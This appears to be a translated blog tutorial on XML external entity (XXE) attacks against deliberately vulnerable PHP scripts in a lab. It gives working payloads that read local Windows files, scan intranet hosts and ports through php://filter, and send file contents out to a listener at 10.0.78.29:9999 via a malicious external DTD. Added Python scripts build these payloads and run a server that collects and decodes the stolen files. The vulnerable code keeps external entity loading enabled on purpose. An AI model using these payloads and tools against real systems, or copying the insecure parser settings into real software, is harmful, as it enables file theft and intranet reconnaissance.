XXE vulnerability demonstration

Environment: phpStudy on Windows hosting xml.php (with echo) and xml2.php (without echo); the attacker machine is a Kali virtual machine.
The code of xml.php is as follows:

<?php
    libxml_disable_entity_loader(false);    // this enables loading of external entities
    // if true, external entity loading is disabled (the safe setting; deprecated in
    // PHP 8, where loading stays off unless LIBXML_NOENT is passed explicitly)
    $xmlfile = file_get_contents('php://input');
    // reads the raw POST body
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    // LIBXML_NOENT: substitute entity references in the XML with their values
    // LIBXML_DTDLOAD: load the DTD referenced in the DOCTYPE
    $creds = simplexml_import_dom($dom);
    // take the DOM document node and convert it to a SimpleXML node
    echo $creds;
?>

I. With echo
1. Reading a local file (one that contains no special characters such as &, <, >, ", ')
<1> Access xml.php
<2> Enter the XXE payload, as follows:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY f SYSTEM "file:///c:/windows/system.ini"> ]>
<creds>&f;</creds>

The following result is obtained: the local file is read successfully. Trying another path also succeeds.
2. Reading a local file (one that contains special characters)
If the file content contains special characters, reading it with the first method causes a parse error, because the content is substituted into the document and then parsed as XML markup. The fix is to wrap it in a CDATA section: everything inside CDATA is treated as literal character data of the element rather than as XML tags.
<1> Access xml.php
<2> Write the external DTD evil.dtd; its content is:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">

(Parameter entity references inside an entity value are only allowed in an external DTD, not in the internal DOCTYPE subset, which is why this declaration lives in evil.dtd and is pulled in with %dtd; rather than written inline.)

<3> Enter the XXE payload, as follows:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///E:/phpStudy/PHPTutorial/WWW/XXE/1.txt">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:81/XXE/evil.dtd">
%dtd; ]>
<roottag>&all;</roottag>

The following result is obtained: the file containing special characters is read successfully.
3. Intranet IP detection
<1> Access xml.php
<2> Enter the XXE payload, as follows:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.78.4"> ]>
<creds>&goodies;</creds>

The following results are obtained. In the first case the response contains the base64-encoded page fetched from the host, so the IP exists; in the second case nothing comes back, so the IP does not exist (replaying the request in Burp Repeater is more convenient). You can also judge whether the IP exists by the length of the response.
4. Intranet port detection
Same as 3. Enter the XXE payload, as follows:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.78.4:80"> ]>
<creds>&goodies;</creds>

The two judgement methods from 3 (whether base64 content comes back, and the length of the response) also tell you whether the port is open. If an error is returned instead, the error output may reveal the service banner directly.
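As an added example (not code from the original post), the following Python script builds the three payload shapes used in sections 1 to 4 and classifies the echoed response the way sections 3 and 4 describe: base64 content means the intranet URL answered and is decoded, libxml's "failed to load external entity" warning (visible in the body when PHP's display_errors is on) means the fetch failed, and anything else is left to be judged by length. The target URL, the IP addresses, the file paths and the sample responses are assumptions.

```python
"""Attacker-side helpers for the echo-based XXE cases on this page.

Added example, not from the original post. Target URL, IPs, paths and
the sample responses are assumptions.
"""
import base64
import re
import urllib.error
import urllib.request


def file_read_payload(path):
    """Section 1: direct read of a file with no XML special characters."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<!DOCTYPE creds [\n'
        f'<!ENTITY f SYSTEM "file:///{path}"> ]>\n'
        '<creds>&f;</creds>'
    )


def cdata_payload(path, dtd_url):
    """Section 2: wrap the file in CDATA through an external DTD.

    evil.dtd must contain <!ENTITY all "%start;%goodies;%end;">; parameter
    entities may only be referenced inside an entity value in an external
    DTD, which is why that line is fetched over HTTP instead of inlined.
    """
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<!DOCTYPE roottag [\n'
        '<!ENTITY % start "<![CDATA[">\n'
        f'<!ENTITY % goodies SYSTEM "file:///{path}">\n'
        '<!ENTITY % end "]]>">\n'
        f'<!ENTITY % dtd SYSTEM "{dtd_url}">\n'
        '%dtd; ]>\n'
        '<roottag>&all;</roottag>'
    )


def probe_payload(host, port=None):
    """Sections 3/4: fetch an intranet URL through php://filter so the
    echoed body is base64 (no bytes that could break the XML)."""
    target = f"http://{host}" + (f":{port}" if port else "")
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<!DOCTYPE creds [\n'
        f'<!ENTITY goodies SYSTEM "php://filter/convert.base64-encode/resource={target}"> ]>\n'
        '<creds>&goodies;</creds>'
    )


def send_xxe(url, payload, timeout=10):
    """POST the XML body to xml.php (the script reads php://input).
    Assumed target URL, e.g. http://10.0.78.4:81/XXE/xml.php."""
    req = urllib.request.Request(url, data=payload.encode(), method="POST",
                                 headers={"Content-Type": "application/xml"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode(errors="replace")


B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# libxml2's wording when the entity loader cannot fetch the resource;
# it appears in the response when PHP's display_errors is on
LOAD_ERROR = "failed to load external entity"


def classify_probe(body):
    """Classify an xml.php response to a probe payload.

    Returns (status, decoded_text):
      'open'    - the intranet URL answered; its base64 body is decoded
      'closed'  - libxml reported it could not load the external entity
      'no-data' - empty echo, nothing was fetched (judge by length/timing)
      'unknown' - something else came back; inspect it manually
    """
    text = body.strip()
    if LOAD_ERROR in text:
        return "closed", ""
    if not text:
        return "no-data", ""
    if B64_RE.match(text):
        try:
            return "open", base64.b64decode(text, validate=True).decode(errors="replace")
        except ValueError:
            pass
    return "unknown", text
```

Usage: `classify_probe(send_xxe("http://10.0.78.4:81/XXE/xml.php", probe_payload("10.0.78.4", 80)))`. A host that is up but has the port closed usually also yields the load error; distinguishing "host down" from "port closed" needs the response time, which the echo alone does not show.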
II. Without echo
The code of xml2.php is as follows:

<?php
    libxml_disable_entity_loader(false);    // enables loading of external entities
    // if true, external entity loading is disabled
    $xmlfile = file_get_contents('php://input');
    // reads the raw POST body
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
?>

xml2.php has no echo, so the data has to be extracted through an out-of-band channel: the parser is made to send the file content to a port we are listening on.
<1> Access xml2.php
<2> Write the external DTD evil2.dtd, with the following content:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/system.ini">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://10.0.78.29:9999?p=%file;'>">

<3> Enter the XXE payload, as follows:

<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://10.0.78.4:81/XXE/evil2.dtd">
%remote;%int;%send;
]>

The result: the listener receives the request carrying the base64 data, so the file is read successfully.
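The listening side of the blind case above, as an added Python example that is not part of the original post: one small HTTP server both serves evil2.dtd and collects the base64 file content that the victim's parser sends to `?p=...`, decoding it instead of leaving the raw request line in a netcat window. The `&#37;` in evil2.dtd is the character reference for `%`: a literal `%` there would be read as a parameter entity reference while evil2.dtd itself is parsed, whereas `&#37;` only becomes `%` when `%int;` is expanded, so the nested `<!ENTITY % send ...>` is declared at that point with `%file;` already substituted into its URL. The listener address, the DTD file name and the sample file text are assumptions; `simulate_victim` stands in for the victim's libxml2 so the chain can be run offline.

```python
"""Listener for the no-echo XXE case: serves evil2.dtd and collects leaks.

Added example, not from the original post. Listener address, DTD name and
the sample file contents are assumptions.
"""
import base64
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_evil_dtd(listener_url, target_file="c:/windows/system.ini"):
    """The external DTD from section II; &#37; becomes '%' only when %int;
    is expanded, which is when the nested 'send' entity gets declared."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/'
        f'resource=file:///{target_file}">\n'
        '<!ENTITY % int "<!ENTITY &#37; send SYSTEM '
        f"'{listener_url}?p=%file;'>\">\n"
    )


def build_oob_payload(dtd_url):
    """The XML posted to xml2.php: it only pulls the DTD and fires the chain."""
    return (
        '<!DOCTYPE convert [\n'
        f'<!ENTITY % remote SYSTEM "{dtd_url}">\n'
        '%remote;%int;%send;\n'
        ']>'
    )


def decode_exfil(path):
    """Recover the file from a request path like /?p=PGh0...

    Query-string parsers turn a raw '+' into a space, which corrupts base64,
    so the value is taken verbatim, percent-decoded only, spaces restored to
    '+', and '=' padding re-added in case URL handling dropped it.
    Returns None when the request carries no p= parameter.
    """
    query = urllib.parse.urlsplit(path).query
    for part in query.split("&"):
        if part.startswith("p="):
            data = urllib.parse.unquote(part[2:]).replace(" ", "+")
            data += "=" * (-len(data) % 4)
            return base64.b64decode(data).decode(errors="replace")
    return None


class ExfilHandler(BaseHTTPRequestHandler):
    collected = []  # decoded files, in arrival order

    def do_GET(self):
        if self.path.endswith("/evil2.dtd"):
            body = build_evil_dtd(self.server.listener_url).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        content = decode_exfil(self.path)
        if content is not None:
            ExfilHandler.collected.append(content)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the example quiet


def start_listener(host="127.0.0.1", port=0):
    """Serve evil2.dtd and collect leaks on host:port (port 0 = any free port).
    On the page's setup this would be the Kali box, e.g. 10.0.78.29:9999."""
    server = HTTPServer((host, port), ExfilHandler)
    server.listener_url = f"http://{host}:{server.server_address[1]}/"
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def simulate_victim(server, file_text):
    """Stand-in for the victim's libxml2: fetch the DTD as %remote; would,
    then send the base64 of a constructed file as %send; would.
    Returns the decoded content the listener recorded."""
    dtd = urllib.request.urlopen(server.listener_url + "evil2.dtd").read().decode()
    assert "%file;" in dtd and "&#37; send" in dtd
    b64 = base64.b64encode(file_text.encode()).decode()
    urllib.request.urlopen(server.listener_url + "?p=" + b64).read()
    return ExfilHandler.collected[-1]
```

Against the real target the attacker posts `build_oob_payload("http://10.0.78.4:81/XXE/evil2.dtd")` to xml2.php while the listener runs; the whole file travels in one GET URL, so very large files are cut off by URL length limits and have to be read in pieces.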

Source: blog.csdn.net/bring_coco/article/details/111429649